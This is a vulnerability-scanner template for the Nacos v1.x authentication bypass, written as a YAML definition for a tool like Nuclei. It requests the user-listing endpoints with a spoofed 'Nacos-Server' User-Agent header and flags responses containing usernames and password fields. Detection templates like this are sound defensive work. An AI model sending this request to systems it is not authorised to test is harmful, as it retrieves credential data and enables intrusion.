id: unauthenticated-nacos-access

info:
  name: Unauthenticated Nacos access v1.x
  author: taielab,pikpikcu
  severity: critical
  reference: https://github.com/alibaba/nacos/issues/4593
  tags: nacos,unauth

requests:
  - method: GET
    path:
      - "{{BaseURL}}/nacos/v1/auth/users?pageNo=1&pageSize=9"
      - "{{BaseURL}}/v1/auth/users?pageNo=1&pageSize=9"
    headers:
      User-Agent: Nacos-Server

    matchers-condition: and
    matchers:

      - type: word
        words:
          - "Content-Type: application/json"
        part: header

      - type: regex
        regex:
          - '"username":'
          - '"password":'
        part: body
        condition: and

      - type: status
        status:
          - 200
